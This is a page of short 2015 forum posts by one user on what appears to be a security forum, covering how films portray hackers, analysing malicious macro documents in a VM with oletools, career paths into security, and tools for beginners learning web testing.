« on: June 19, 2015, 03:59:59 pm »
Hacker films and hackers in film are usually awful. Here's some things that annoy me:

- Typing speed is commensurate with one's ability to "penetrate the firewall."
- Victim, or hacker who is stuffed, has their screen taken over by a screen saver from 1993.
- Hacker is always savant type, as if knowing how to code and getting laid are mutually exclusive.
- Recon and research, 96% of hacking (whether it is offensive, or solving a stupid problem), are amazingly absent.

Here's some stuff I'd dig in a movie:

- Explain the "kill chain": lure, dropper, C2, traversal, attack on DB/mem, exfil. If fucking Jurassic Park can explain pulling dinosaur DNA from misquitos suck in amber, then sure the audience could sit through a quick cartoon explaining attack phases.

- Give the universe credit where its due. I'm confident of my skills, but honestly, I've been really, really lucky on some projects I've worked on. I tried something dumb, or something by accident, and it worked, and I become a spaz. I can't be the only one with this experience.

- Show all the work that happens away from the keyboard. I do my best thinking outside, with a coffee and a cigarette. One of my girlfriends does crochet. But we both have had those "oh shit" moments where a new approach comes to us and we run back to the keyboard.

13
General discussion / Re: Where do you get malware samples to study?
« on: June 18, 2015, 04:37:04 pm »
Just go to your google junk mail bin and detonate all the attachments in VM with Wireshark on.

A lof of the lures are macro-enabled docs that actually POLITELY ASK the victim to enable macros. I wrote a Python script using oletools to extract the VBA from from these docs, then insert the VBA into a new doc, comment out all the AutoRun and Shell lines, and step through it.

You'll see callbacks, the location of the instructions its pull, as well as what the file names itself and its path.

14
General discussion / Re: Change my life
« on: June 18, 2015, 04:26:43 pm »
I'd aim a little lower. Go to tech school and do a CCNA type program, then maybe start with help desk or jr engineer. Way too  many "security management" programs letting chuckleheads blunder into leadership roles, then the actual talent says "fuck this, i'm out." Also, I've seen reality catch up to some of them, and once it's found out they don't know shit, and everybody knows, they have to move out of town to get a job again.

15
Beginner's Corner / Re: Suggested Software for Beginner Website Hacking
« on: June 18, 2015, 04:07:54 pm »
I think it's probably good for new folks to have Wireshark running while playing with Burp or Tamper, just to reinforce TCP/IP, in case they want to get a job on the defensive side some day.

Pages: [1] 2